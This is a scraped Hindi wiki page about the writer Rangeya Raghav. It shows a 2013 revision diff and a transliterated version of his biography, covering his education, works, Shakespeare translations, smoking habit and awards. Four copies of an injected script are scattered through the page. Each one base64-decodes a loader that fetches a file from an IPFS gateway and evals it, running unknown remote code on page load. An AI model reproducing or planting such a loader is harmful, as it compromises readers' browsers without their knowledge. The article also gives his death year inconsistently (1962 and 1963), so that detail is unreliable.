Difference between revisions of "रांगेय राघव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
Line 2: Line 2:
 
|चित्र=Rangeya-Raghav.jpg
 
|चित्र=Rangeya-Raghav.jpg
 
|चित्र का नाम=रांगेय राघव
 
|चित्र का नाम=रांगेय राघव
|पूरा नाम=रांगेय राघव
+
|पूरा नाम=तिरूमल्लै नंबकम् वीरराघव आचार्य (टी.एन.बी.आचार्य)
 
|अन्य नाम=
 
|अन्य नाम=
|जन्म=17 जनवरी, 1923
+
|जन्म=[[17 जनवरी]], [[1923]]
 
|जन्म भूमि=[[आगरा]], [[उत्तर प्रदेश]]
 
|जन्म भूमि=[[आगरा]], [[उत्तर प्रदेश]]
|मृत्यु=12 सितंबर, 1962
+
|मृत्यु=[[12 सितंबर]], [[1962]]
 
|मृत्यु स्थान=[[मुंबई]], [[महाराष्ट्र]]
 
|मृत्यु स्थान=[[मुंबई]], [[महाराष्ट्र]]
 
|अविभावक=
 
|अविभावक=
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
रांगेय राघव (जन्म: [[17 जनवरी]], 1923; मृत्यु: [[12 सितंबर]], 1962) असाधारण प्रतिभा के धनी रचनाकार थे। [[हिन्दी]] के विशिष्ट और बहुमुखी प्रतिभावालों में से एक थे। इनका मूल नाम टी.एन.बी.आचार्य (तिरूमल्लै नंबकम् वीरराघव आचार्य) था। वे रामानुजाचार्य परम्परा के तमिल देशीय आयंगर ब्राह्मण थे।
+
रांगेय राघव (जन्म: [[17 जनवरी]], 1923; मृत्यु: [[12 सितंबर]], 1962) असाधारण प्रतिभा के धनी रचनाकार थे। [[हिन्दी]] के विशिष्ट और बहुमुखी प्रतिभावालों में से एक थे। इनका मूल नाम टी.एन.बी.आचार्य (तिरूमल्लै नंबकम् वीरराघव आचार्य) था। [[हिन्दी साहित्य]] का सभंवत: ऐसा कोई अंग नहीं है, जहाँ हिन्दी साहित्य के साधक डॉ. रांगेय राघव ने अपनी साधना का प्रयोग न किया हो। ये गौर वर्ण, उन्नत ललाट, लम्बी नासिका और चेहरे पर गंभीरतामयी मुस्कान बिखेरे हुए हिन्दी साहित्य के अनन्य उपासक थे। वे [[रामानुजाचार्य]] परम्परा के तमिल देशीय आयंगर ब्राह्मण थे।  
==जन्म==  
+
==जीवन परिचय==  
रांगेय राघव का जन्म 17 जनवरी, 1923 ई. में [[आगरा]] में हुआ था। पिता श्री रंगाचार्य के पूर्वज लगभग तीन सौ वर्ष पहले [[जयपुर]] और फिर [[भरतपुर]] के बयाना कस्बे में आकर रहने लगे थे। रांगेय राघव का जन्म हिन्दी प्रदेश में हुआ। उन्हें [[तमिल भाषा|तमिल]] और [[कन्नड़ भाषा]] का भी ज्ञान था।  
+
रांगेय राघव का जन्म 17 जनवरी, 1923 ई. में [[आगरा]] में हुआ था। पिता श्री रंगाचार्य के पूर्वज लगभग तीन सौ वर्ष पहले [[जयपुर]] और फिर [[भरतपुर]] के बयाना कस्बे में आकर रहने लगे थे। रांगेय राघव का जन्म हिन्दी प्रदेश में हुआ। उन्हें [[तमिल भाषा|तमिल]] और [[कन्नड़ भाषा]] का भी ज्ञान था। रांगेय की शिक्षा आगरा में हुई थी। सेंट जॉन्स कॉलेज से 1944 में स्नातकोत्तर और 1949 में आगरा विश्वविद्यालय से गुरु गोरखनाथ पर शोध करके उन्होंने पी.एच.डी. की थी। रांगेय राघव का [[हिन्दी]], [[अंग्रेज़ी]], [[ब्रजभाषा|ब्रज]] और [[संस्कृत]] पर असाधारण अधिकार था।
==शिक्षा==
 
रांगेय की शिक्षा आगरा में हुई थी। सेंट जॉन्स कॉलेज से 1944 में स्नातकोत्तर और 1949 में आगरा विश्वविद्यालय से गुरु गोरखनाथ पर शोध करके उन्होंने पी.एच.डी. की थी। रांगेय राघव का हिन्दी, [[अंग्रेज़ी]], [[ब्रजभाषा|ब्रज]] और [[संस्कृत]] पर असाधारण अधिकार था।
 
 
==रचनाएँ==  
 
==रचनाएँ==  
 
रांगेय राघव हिन्दी के प्रगतिशील विचारों के लेखक थे, किन्तु मार्क्स के [[दर्शन]] को उन्होंने संशोधित रूप में ही स्वीकार किया। उन्होंने अल्प समय में ही कितने साहित्य का सृजन किया, इसका अनुमान इस विवरण से लगाया जा सकता है। उनके प्रकाशित ग्रन्थों में 42 उपन्यास, 11 कहानी, 12 आलोचनात्मक ग्रन्थ, 8 काव्य, 4 इतिहास, 6 समाजशास्त्र विषयक, 5 नाटक और लगभग 50 अनूदित पुस्तकें हैं। ये सब रचनाएँ उनके जीवन काल में प्रकाशित हो चुकी थीं। 39 वर्ष की कच्ची उम्र में इनका देहान्त हुआ, लगभग 20 पुस्तकें प्रकाशन की प्रतीक्षा में थीं। यद्यपि उन्होंने कुछ अंग्रेज़ी ग्रन्थों के भी अनुवाद किए, किन्तु उनके अधिकांश साहित्य का परिवेश भारतीय संस्कृति और ऐतिहासिक जीवन ही रहा है।  
 
रांगेय राघव हिन्दी के प्रगतिशील विचारों के लेखक थे, किन्तु मार्क्स के [[दर्शन]] को उन्होंने संशोधित रूप में ही स्वीकार किया। उन्होंने अल्प समय में ही कितने साहित्य का सृजन किया, इसका अनुमान इस विवरण से लगाया जा सकता है। उनके प्रकाशित ग्रन्थों में 42 उपन्यास, 11 कहानी, 12 आलोचनात्मक ग्रन्थ, 8 काव्य, 4 इतिहास, 6 समाजशास्त्र विषयक, 5 नाटक और लगभग 50 अनूदित पुस्तकें हैं। ये सब रचनाएँ उनके जीवन काल में प्रकाशित हो चुकी थीं। 39 वर्ष की कच्ची उम्र में इनका देहान्त हुआ, लगभग 20 पुस्तकें प्रकाशन की प्रतीक्षा में थीं। यद्यपि उन्होंने कुछ अंग्रेज़ी ग्रन्थों के भी अनुवाद किए, किन्तु उनके अधिकांश साहित्य का परिवेश भारतीय संस्कृति और ऐतिहासिक जीवन ही रहा है।  
 +
==हिंदी के शेक्सपीयर==
 +
शायद बहुत कम लोग यह जानते होंगे कि हिन्दी साहित्य का यह अनूठा व्यक्तित्व वस्तुत: [[तमिल भाषा|तमिल]] भाषी था, जिसने हिन्दी साहित्य और भाषा की सेवा करके अपने अलौकिक प्रतिभा से हिन्दी के 'शेक्सपीयर' की संज्ञा ग्रहण की। रांगेय राघव नाम के पीछे उनके व्यक्तित्व और साहित्य में दृष्टिगत होने वाली स्मन्वय की भावना परिलक्षित होती है। अपने पिता रंगाचार्य के नाम से उन्होंने रांगेय स्वीकार किया और अपने स्वयं के नाम राघवाचार्य से राघव शब्द लेकर अपना नाम रांगेय राघव रख लिया। उनके साहित्य में जैसे सादगी परिलक्षित होती है वैसे ही उनका जीवन सीधा-सधा और सादगीपूर्ण रहा है।<ref name="साहित्य कुञ्ज">{{cite web |url=http://www.sahityakunj.net/LEKHAK/M/MCKatarpanch/Hindi_ke_Shekspear_Aalekh.htm |title=हिन्दी के शेक्सपीयर: तमिल भाषी हिन्दी साधक - रांगेय राघव |accessmonthday=22 जनवरी |accessyear=2013 |last=कटरपंच  |first=एम.सी. |authorlink= |format=एच.टी.एम.एल |publisher=साहित्य कुञ्ज |language=हिंदी }} </ref>
 +
====साहित्य की साधना====
 +
[[भरतपुर ज़िला|भरतपुर ज़िले]] में एक तहसील है वैर। शहर के कोलाहल से दूर प्राकृतिक वातावरण, ग्रामीण सादगी और संस्कृति तथा वहाँ के वातावरण की अद्‌भुत शक्ति ने रांगेय राघव को साहित्य की साधना में इस सीमा तक प्रयुक्त किया कि वह उस छोटी सी नगरी वैर में ही बस गये। वैर भरतपुर के जाट राजाओं के एक छोटे से क़िले के कारण तो प्रसिद्ध है ही, परन्तु वहाँ [[तमिलनाडु]] के स्वामी रंगाचार्य का दक्षिण शैली का सीतारामजी का मंदिर भी बहुत प्रसिद्ध है। इस मंदिर के महंत डॉ. रांगेय राघव के बड़े भाई रहे हैं। मंदिर की शाला में बिल्कुल तपस्वी जैसा जीवन व्यतीत करने वाले तमिल भाषी व्यक्ति ने हिन्दी साहित्य की देवी की पुजारी की तरह आराधना-अर्चना की। नारियल की जटाओं के गद्दे पर लेटे-लेटे और अपने पैर के अँगूठे में छत पर टंगे पंखे की डोरी को बाँधकर हिलाते हुए वह घंटों तक साहित्य की विभिन्न विधाओं और अयामों के बारे में सोचते रहते थे। जब डॉ. रांगेय राघव सोचते तो सोचते ही रहते थे - कई दिनों तक न वह कुछ लिखते और न पढ़ते। और जब उन्हें पढ़ने की धुन सवार होती तो वह लगातार कई दिनों तक पढ़ते ही रहते। सोचने और पढ़ने के बाद जब कभी उनका मूड बनता तो वह लिखने बैठ जाते और निरन्तर लिखते ही रहते। लिखने की उनकी कला अद्‌भुत थी। एक बार तो लिखने बैठे तो वह उस रचना को समाप्त करके ही छोड़ते थे। इसी कारण जितनी कृतियाँ उन्होंने लिखीं वह सब पूरी की पूरी लिखी गईं। उनका अंतिम उपन्यास 'आखिरी आवाज़' कुछ अर्थों में इस कारण अधूरा रह गया कि वह कई महीनों तक मौत से जूझते रहे। काश ऐसा होता कि वह मौत से जूझने के बाद जीवित रहे होते तो शायद एक और उपन्यास मौत के संघर्ष के बारे में हिन्दी साहित्य को मिल गया होता।<ref name="साहित्य कुञ्ज"/>
 +
====जानपील सिगरेट====
 +
सिगरेट पीने का उन्हें बेहद शौक था। वह सिगरेट पीते तो केवल जानपील ही, दूसरी सिगरेट को वह हाथ तक नहीं लगाते थे। एक दर्जन सिगरेट की डिब्बी उनकी लिखने की मेज पर रखी रहती थीं और ऐश-ट्रे के नाम पर रखा गया चीनी का प्याला दिन में तीन-चार बार साफ करना पड़ता। उनका कमरा था कि सिगरेट की गंध और धुएँ से भरा रहता था। किसी भी आँगन्तुक ने आकर उनके कमरे का दरवाजा खोला तो सिगरेट का एक भभका उसे लगता, परन्तु हिन्दी साहित्य के इस साधक के लिये सिगरेट पीना एक आवश्यकता बन गई थी। बिना सिगरेट पिये वह कुछ भी कर सकने में असमर्थ थे। परन्तु शायद सिगरेट पीने की यह आदत ही उनकी मृत्यु का कारण बनी, जिसने 1963 में [[हिन्दी]] के इस अनुपम योद्धा को हमसे हमेशा के लिये छीन लिया।<ref name="साहित्य कुञ्ज"/>
 +
====शेक्सपीयर के नाटकों का अनुवाद====
 +
विदेशी साहित्य को हिन्दी भाषा के माध्यम से हिन्दी भाषी जनता तक पहुँचाने का महान कार्य डॉ. रांगेय राघव ने किया। [[अंग्रेज़ी]] भाषा के माध्यम से कुछ फ्राँसिसी और जर्मन साहित्यकारों का अध्ययन करने के पश्चात्‌ उनके बारे में हिन्दी जगत को अवगत कराने का कार्य उन्होंने किया। विश्व प्रसिद्ध अंग्रेज़ी नाटककार शेक्सपीयर को तो उन्होंने पूरी तरह हिन्दी में उतार ही दिया। शेक्सपीयर की अनेक रचनाओं को हिन्दी में अनुवादित करके हिन्दी जगत को विश्व की महान कृतियों से धनी बनाया। शेक्सपीयर को दुखांत नाटकों में हेमलेट, ओथेलो और मैकबेथ को तो जिस खूबी से डॉ.-रांगेय राघव ने हिन्दी के पाँडाल में उतारा वह उनके जीवन की विशेष उपलब्धियों में गिनी जाती है। उनके अनुवाद की यह विशेषता थीं कि वह अनुवाद न लगकर मूल रचना ही प्रतीत होती है। शेक्सपीयर की लब्ध प्रतिष्ठित कृतियों को हिन्दी में प्रस्तुत कर उनकी भावनाओं के अनुरूप शेक्सपीयर को हिन्दी साहित्य में प्रकट करने का श्रेय डॉ. रांगेय राघव को ही जाता है और इसी कारण वह हिन्दी के शेक्सपीयर कहे जाते हैं।<ref name="साहित्य कुञ्ज"/>
 
==पुरस्कार==  
 
==पुरस्कार==  
रांगेय राघव को हिंदुस्तानी अकादमी पुरस्कार (1947), डालमिया पुरस्कार (1954), उत्तर प्रदेश शासन पुरस्कार (1957 तथा 1959), राजस्थान साहित्य अकादमी पुरस्कार (1961) और इनके निधन के बाद महात्मा गाँधी पुरस्कार (1966) से सम्मानित किया। अनेक रचनाओं का हिंदीतर भारतीय और विदेशी भाषाओं में भी अनुवाद किया।
+
* हिंदुस्तानी अकादमी पुरस्कार (1947)
 +
* डालमिया पुरस्कार (1954)
 +
* उत्तर प्रदेश शासन पुरस्कार (1957 तथा 1959)
 +
* राजस्थान साहित्य अकादमी पुरस्कार (1961)
 +
* महात्मा गाँधी पुरस्कार<ref>यह पुरस्कार इन्हें मरणोपरांत दिया गया था।</ref> (1966)  
 
==निधन==  
 
==निधन==  
 
रांगेय राघव का निधन मात्र 39 वर्ष की उम्र में [[मुंबई]] में सन् 1962 में हो गया था। इस अद्भुत रचनाकार को मृत्यु ने इतनी जल्दी न उठा लिया होता तो वे और भी नये मापदण्ड स्थापित करते।
 
रांगेय राघव का निधन मात्र 39 वर्ष की उम्र में [[मुंबई]] में सन् 1962 में हो गया था। इस अद्भुत रचनाकार को मृत्यु ने इतनी जल्दी न उठा लिया होता तो वे और भी नये मापदण्ड स्थापित करते।
Line 46: Line 56:
  
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{साहित्यकार}}
 
{{साहित्यकार}}

Revision as of 12:20, 22 January 2013

raangey raghav
poora nam tiroomallai nanbakamh viraraghav achary (ti.en.bi.achary)
janm 17 janavari, 1923
janm bhoomi agara, uttar pradesh
mrityu 12 sitanbar, 1962
mrityu sthan muanbee, maharashtr
palak mata-pita pita- shri rangachary
bhasha hindi, aangrezi, braj aur sanskrit
vidyalay seant j aauns k aaulej, agara vishvavidyalay
shiksha snatakottar, pi.ech.di
puraskar-upadhi hiandustani akadami puraskar, dalamiya puraskar, uttar pradesh shasan puraskar, rajasthan sahity akadami puraskar
nagarikata bharatiy
any janakari inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

raangey raghav (janm: 17 janavari, 1923; mrityu: 12 sitanbar, 1962) asadharan pratibha ke dhani rachanakar the. hindi ke vishisht aur bahumukhi pratibhavaloan mean se ek the. inaka mool nam ti.en.bi.achary (tiroomallai nanbakamh viraraghav achary) tha. hindi sahity ka sabhanvat: aisa koee aang nahian hai, jahaan hindi sahity ke sadhak d aau. raangey raghav ne apani sadhana ka prayog n kiya ho. ye gaur varn, unnat lalat, lambi nasika aur chehare par ganbhiratamayi muskan bikhere hue hindi sahity ke anany upasak the. ve ramanujachary parampara ke tamil deshiy ayangar brahman the.

jivan parichay

raangey raghav ka janm 17 janavari, 1923 ee. mean agara mean hua tha. pita shri rangachary ke poorvaj lagabhag tin sau varsh pahale jayapur aur phir bharatapur ke bayana kasbe mean akar rahane lage the. raangey raghav ka janm hindi pradesh mean hua. unhean tamil aur kann d bhasha ka bhi jnan tha. raangey ki shiksha agara mean huee thi. seant j aauns k aaulej se 1944 mean snatakottar aur 1949 mean agara vishvavidyalay se guru gorakhanath par shodh karake unhoanne pi.ech.di. ki thi. raangey raghav ka hindi, aangrezi, braj aur sanskrit par asadharan adhikar tha.

rachanaean

raangey raghav hindi ke pragatishil vicharoan ke lekhak the, kintu marks ke darshan ko unhoanne sanshodhit roop mean hi svikar kiya. unhoanne alp samay mean hi kitane sahity ka srijan kiya, isaka anuman is vivaran se lagaya ja sakata hai. unake prakashit granthoan mean 42 upanyas, 11 kahani, 12 alochanatmak granth, 8 kavy, 4 itihas, 6 samajashastr vishayak, 5 natak aur lagabhag 50 anoodit pustakean haian. ye sab rachanaean unake jivan kal mean prakashit ho chuki thian. 39 varsh ki kachchi umr mean inaka dehant hua, lagabhag 20 pustakean prakashan ki pratiksha mean thian. yadyapi unhoanne kuchh aangrezi granthoan ke bhi anuvad kie, kintu unake adhikaansh sahity ka parivesh bharatiy sanskriti aur aitihasik jivan hi raha hai.

hiandi ke sheksapiyar

shayad bahut kam log yah janate hoange ki hindi sahity ka yah anootha vyaktitv vastut: tamil bhashi tha, jisane hindi sahity aur bhasha ki seva karake apane alaukik pratibha se hindi ke 'sheksapiyar' ki sanjna grahan ki. raangey raghav nam ke pichhe unake vyaktitv aur sahity mean drishtigat hone vali smanvay ki bhavana parilakshit hoti hai. apane pita rangachary ke nam se unhoanne raangey svikar kiya aur apane svayan ke nam raghavachary se raghav shabd lekar apana nam raangey raghav rakh liya. unake sahity mean jaise sadagi parilakshit hoti hai vaise hi unaka jivan sidha-sadha aur sadagipoorn raha hai.[1]

sahity ki sadhana

bharatapur zile mean ek tahasil hai vair. shahar ke kolahal se door prakritik vatavaran, gramin sadagi aur sanskriti tatha vahaan ke vatavaran ki adh‌bhut shakti ne raangey raghav ko sahity ki sadhana mean is sima tak prayukt kiya ki vah us chhoti si nagari vair mean hi bas gaye. vair bharatapur ke jat rajaoan ke ek chhote se qile ke karan to prasiddh hai hi, parantu vahaan tamilanadu ke svami rangachary ka dakshin shaili ka sitaramaji ka mandir bhi bahut prasiddh hai. is mandir ke mahant d aau. raangey raghav ke b de bhaee rahe haian. mandir ki shala mean bilkul tapasvi jaisa jivan vyatit karane vale tamil bhashi vyakti ne hindi sahity ki devi ki pujari ki tarah aradhana-archana ki. nariyal ki jataoan ke gadde par lete-lete aur apane pair ke aangoothe mean chhat par tange pankhe ki dori ko baandhakar hilate hue vah ghantoan tak sahity ki vibhinn vidhaoan aur ayamoan ke bare mean sochate rahate the. jab d aau. raangey raghav sochate to sochate hi rahate the - kee dinoan tak n vah kuchh likhate aur n padhate. aur jab unhean padhane ki dhun savar hoti to vah lagatar kee dinoan tak padhate hi rahate. sochane aur padhane ke bad jab kabhi unaka mood banata to vah likhane baith jate aur nirantar likhate hi rahate. likhane ki unaki kala adh‌bhut thi. ek bar to likhane baithe to vah us rachana ko samapt karake hi chho date the. isi karan jitani kritiyaan unhoanne likhian vah sab poori ki poori likhi geean. unaka aantim upanyas 'akhiri avaz' kuchh arthoan mean is karan adhoora rah gaya ki vah kee mahinoan tak maut se joojhate rahe. kash aisa hota ki vah maut se joojhane ke bad jivit rahe hote to shayad ek aur upanyas maut ke sangharsh ke bare mean hindi sahity ko mil gaya hota.[1]

janapil sigaret

sigaret pine ka unhean behad shauk tha. vah sigaret pite to keval janapil hi, doosari sigaret ko vah hath tak nahian lagate the. ek darjan sigaret ki dibbi unaki likhane ki mej par rakhi rahati thian aur aish-tre ke nam par rakha gaya chini ka pyala din mean tin-char bar saph karana p data. unaka kamara tha ki sigaret ki gandh aur dhuean se bhara rahata tha. kisi bhi aangantuk ne akar unake kamare ka daravaja khola to sigaret ka ek bhabhaka use lagata, parantu hindi sahity ke is sadhak ke liye sigaret pina ek avashyakata ban gee thi. bina sigaret piye vah kuchh bhi kar sakane mean asamarth the. parantu shayad sigaret pine ki yah adat hi unaki mrityu ka karan bani, jisane 1963 mean hindi ke is anupam yoddha ko hamase hamesha ke liye chhin liya.[1]

sheksapiyar ke natakoan ka anuvad

videshi sahity ko hindi bhasha ke madhyam se hindi bhashi janata tak pahuanchane ka mahan kary d aau. raangey raghav ne kiya. aangrezi bhasha ke madhyam se kuchh phraansisi aur jarman sahityakaroan ka adhyayan karane ke pashchath‌ unake bare mean hindi jagat ko avagat karane ka kary unhoanne kiya. vishv prasiddh aangrezi natakakar sheksapiyar ko to unhoanne poori tarah hindi mean utar hi diya. sheksapiyar ki anek rachanaoan ko hindi mean anuvadit karake hindi jagat ko vishv ki mahan kritiyoan se dhani banaya. sheksapiyar ko dukhaant natakoan mean hemalet, othelo aur maikabeth ko to jis khoobi se d aau.-raangey raghav ne hindi ke paandal mean utara vah unake jivan ki vishesh upalabdhiyoan mean gini jati hai. unake anuvad ki yah visheshata thian ki vah anuvad n lagakar mool rachana hi pratit hoti hai. sheksapiyar ki labdh pratishthit kritiyoan ko hindi mean prastut kar unaki bhavanaoan ke anuroop sheksapiyar ko hindi sahity mean prakat karane ka shrey d aau. raangey raghav ko hi jata hai aur isi karan vah hindi ke sheksapiyar kahe jate haian.[1]

puraskar

  • hiandustani akadami puraskar (1947)
  • dalamiya puraskar (1954)
  • uttar pradesh shasan puraskar (1957 tatha 1959)
  • rajasthan sahity akadami puraskar (1961)
  • mahatma gaandhi puraskar[2] (1966)

nidhan

raangey raghav ka nidhan matr 39 varsh ki umr mean muanbee mean sanh 1962 mean ho gaya tha. is adbhut rachanakar ko mrityu ne itani jaldi n utha liya hota to ve aur bhi naye mapadand sthapit karate.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 katarapanch, em.si.. hindi ke sheksapiyar: tamil bhashi hindi sadhak - raangey raghav (hiandi) (ech.ti.em.el) sahity kunj. abhigaman tithi: 22 janavari, 2013.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. yah puraskar inhean maranoparaant diya gaya tha.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>